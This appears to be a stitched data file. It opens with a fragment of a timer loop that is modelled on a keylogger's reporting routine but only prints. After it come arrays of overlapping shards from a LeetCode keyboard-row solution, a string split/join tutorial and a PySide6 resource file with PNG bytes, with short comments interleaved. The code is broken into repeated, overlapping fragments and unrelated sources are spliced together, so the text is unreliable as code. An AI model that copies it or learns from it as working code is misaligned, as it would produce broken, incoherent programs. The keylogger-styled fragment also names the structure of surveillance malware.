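    print("reporting...")  # stand-in for Keylogger.sendmail()
    # re-arm: each call schedules the next run on a fresh timer thread
    Timer(interval=interval, function=report, args=(interval,)).start()

if __name__ == "__main__":
    report(2.0)
    Semaphore(0).acquire()  # block the main thread, as Keylogger.start() does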
[
"return the words that can be typed using letters of alphabet on only",
"= ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 =",
"Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use",
"for letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1",
"typed using letters of alphabet on only one row's of American keyboard like",
"list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1 if letter in",
"{'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()): if letter in",
"\"\"\" from typing import List class Solution: def findWords(self, words: List[str]) -> List[str]:",
"Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r',",
"image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You",
"row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 =",
"alphabet. \"\"\" from typing import List class Solution: def findWords(self, words: List[str]) ->",
"List class Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w',",
"like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"]",
"if letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word)",
"Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] == len(word)",
"['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x',",
"= Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] == len(word) or",
"'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h',",
"You may use one character in the keyboard more than once. You may",
"'third': 0} for letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first']",
"Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word): inteligentWords.append(word) return",
"'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's',",
"Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third']",
"Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second'] + 1 if",
"inteligentWords = [] for word in words: Hash = {'first': 0, 'second': 0,",
"from typing import List class Solution: def findWords(self, words: List[str]) -> List[str]: row1",
"class Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e',",
"'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3",
"words that can be typed using letters of alphabet on only one row's",
"below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may",
"letter in row2: Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third']",
"keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\",",
"Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third'] +",
"'b', 'n', 'm'] inteligentWords = [] for word in words: Hash = {'first':",
"Hash = {'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()): if",
"['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a',",
"only contain letters of alphabet. \"\"\" from typing import List class Solution: def",
"[] for word in words: Hash = {'first': 0, 'second': 0, 'third': 0}",
"List of words, return the words that can be typed using letters of",
"letters of alphabet on only one row's of American keyboard like the image",
"+ 1 if letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first']",
"def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't',",
"row's of American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\",",
"words: Hash = {'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()):",
"[\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character",
"import List class Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q',",
"assume the input string will only contain letters of alphabet. \"\"\" from typing",
"'s', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c',",
"\"\"\" Given a List of words, return the words that can be typed",
"letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or",
"'v', 'b', 'n', 'm'] inteligentWords = [] for word in words: Hash =",
"if letter in row1: Hash['first'] = Hash['first'] + 1 if letter in row2:",
"= {'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()): if letter",
"'d', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v',",
"'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd',",
"using letters of alphabet on only one row's of American keyboard like the",
"+ 1 if letter in row2: Hash['second'] = Hash['second'] + 1 if letter",
"of American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]",
"typing import List class Solution: def findWords(self, words: List[str]) -> List[str]: row1 =",
"one character in the keyboard more than once. You may assume the input",
"\"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character in",
"'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word in words: Hash",
"keyboard more than once. You may assume the input string will only contain",
"0} for letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] +",
"in the keyboard more than once. You may assume the input string will",
"in words: Hash = {'first': 0, 'second': 0, 'third': 0} for letter in",
"1 if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word):",
"of words, return the words that can be typed using letters of alphabet",
"<filename>Hash/keyword-rows.py \"\"\" Given a List of words, return the words that can be",
"string will only contain letters of alphabet. \"\"\" from typing import List class",
"if letter in row2: Hash['second'] = Hash['second'] + 1 if letter in row3:",
"words, return the words that can be typed using letters of alphabet on",
"of alphabet on only one row's of American keyboard like the image below.",
"'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = []",
"in row1: Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second'] =",
"= ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word",
"'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f',",
"words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u',",
"'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word in words:",
"+ 1 if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] ==",
"['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word in",
"row2: Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third']",
"'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j',",
"of alphabet. \"\"\" from typing import List class Solution: def findWords(self, words: List[str])",
"in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1 if letter",
"if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word): inteligentWords.append(word)",
"the keyboard more than once. You may assume the input string will only",
"for word in words: Hash = {'first': 0, 'second': 0, 'third': 0} for",
"only one row's of American keyboard like the image below. Example: Input: [\"Hello\",",
"Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third'] + 1 if",
"in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second']",
"one row's of American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\",",
"in row2: Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third'] =",
"[\"Alaska\", \"Dad\"] Note: You may use one character in the keyboard more than",
"== len(word) or Hash['second'] == len(word) or Hash['third'] == len(word): inteligentWords.append(word) return inteligentWords",
"Given a List of words, return the words that can be typed using",
"You may assume the input string will only contain letters of alphabet. \"\"\"",
"character in the keyboard more than once. You may assume the input string",
"may use one character in the keyboard more than once. You may assume",
"-> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o',",
"use one character in the keyboard more than once. You may assume the",
"Note: You may use one character in the keyboard more than once. You",
"Output: [\"Alaska\", \"Dad\"] Note: You may use one character in the keyboard more",
"row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2",
"row1: Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second']",
"'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n',",
"'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b',",
"Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second'] +",
"'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k',",
"may assume the input string will only contain letters of alphabet. \"\"\" from",
"= Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third'] + 1",
"= Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second'] + 1",
"\"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character in the",
"be typed using letters of alphabet on only one row's of American keyboard",
"can be typed using letters of alphabet on only one row's of American",
"word in words: Hash = {'first': 0, 'second': 0, 'third': 0} for letter",
"row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] ==",
"letter in row1: Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second']",
"the input string will only contain letters of alphabet. \"\"\" from typing import",
"'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords",
"row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for",
"the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note:",
"once. You may assume the input string will only contain letters of alphabet.",
"the words that can be typed using letters of alphabet on only one",
"input string will only contain letters of alphabet. \"\"\" from typing import List",
"'m'] inteligentWords = [] for word in words: Hash = {'first': 0, 'second':",
"letters of alphabet. \"\"\" from typing import List class Solution: def findWords(self, words:",
"'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l']",
"'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm']",
"'second': 0, 'third': 0} for letter in list(word.lower()): if letter in row1: Hash['first']",
"\"Dad\"] Note: You may use one character in the keyboard more than once.",
"that can be typed using letters of alphabet on only one row's of",
"letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1 if",
"List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p'];",
"'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords =",
"1 if letter in row2: Hash['second'] = Hash['second'] + 1 if letter in",
"\"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one character in the keyboard",
"= [] for word in words: Hash = {'first': 0, 'second': 0, 'third':",
"'n', 'm'] inteligentWords = [] for word in words: Hash = {'first': 0,",
"alphabet on only one row's of American keyboard like the image below. Example:",
"'t', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g',",
"0, 'third': 0} for letter in list(word.lower()): if letter in row1: Hash['first'] =",
"a List of words, return the words that can be typed using letters",
"will only contain letters of alphabet. \"\"\" from typing import List class Solution:",
"= ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z',",
"List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i',",
"on only one row's of American keyboard like the image below. Example: Input:",
"more than once. You may assume the input string will only contain letters",
"Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output: [\"Alaska\", \"Dad\"] Note: You may use one",
"than once. You may assume the input string will only contain letters of",
"findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y',",
"contain letters of alphabet. \"\"\" from typing import List class Solution: def findWords(self,",
"1 if letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] ==",
"0, 'second': 0, 'third': 0} for letter in list(word.lower()): if letter in row1:",
"American keyboard like the image below. Example: Input: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"] Output:"
] |
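The counting approach works, but the same check reads more directly with set algebra: a word qualifies exactly when its letters form a subset of one keyboard row. A sketch of that equivalent formulation (not the reference solution, just an alternative):

from typing import List

ROWS = [set("qwertyuiop"), set("asdfghjkl"), set("zxcvbnm")]

def find_words(words: List[str]) -> List[str]:
    # set(w.lower()) <= row  <=>  every letter of w lies on that row
    return [w for w in words if any(set(w.lower()) <= row for row in ROWS)]

print(find_words(["Hello", "Alaska", "Dad", "Peace"]))  # ['Alaska', 'Dad']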
[
"<reponame>janbodnar/Python-Course #!/usr/bin/python # split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m",
"#!/usr/bin/python # split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m =",
"split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m = ':'.join(n) print",
"# split_join.py nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m = ':'.join(n)",
"nums = \"1,5,6,8,2,3,1,9\" n = nums.split(\",\") print (n) m = ':'.join(n) print (m)"
] |
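split and join are inverses as long as the separator is kept consistent, which is the point of the example above; a quick round-trip check (the short CSV-style string here is just an assumption for illustration):

csv = "a,b,c"
parts = csv.split(",")         # ['a', 'b', 'c']
assert ",".join(parts) == csv  # join undoes split for the same separator
print("-".join(parts))         # a-b-c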
[
"in this file will be lost! from PySide6 import QtCore qt_resource_data = b\"\\",
"QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\",
"\\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\",
"\\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\",
"c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\",
"\\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \"",
"changes made in this file will be lost! from PySide6 import QtCore qt_resource_data",
"\\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\",
"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)",
"\\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c",
"code (Python 3) # Created by: object code # Created by: The Resource",
"import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\",
"\\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\",
"\\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\",
"\\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\",
"S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\",
"\\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\",
"<gh_stars>0 # Resource object code (Python 3) # Created by: object code #",
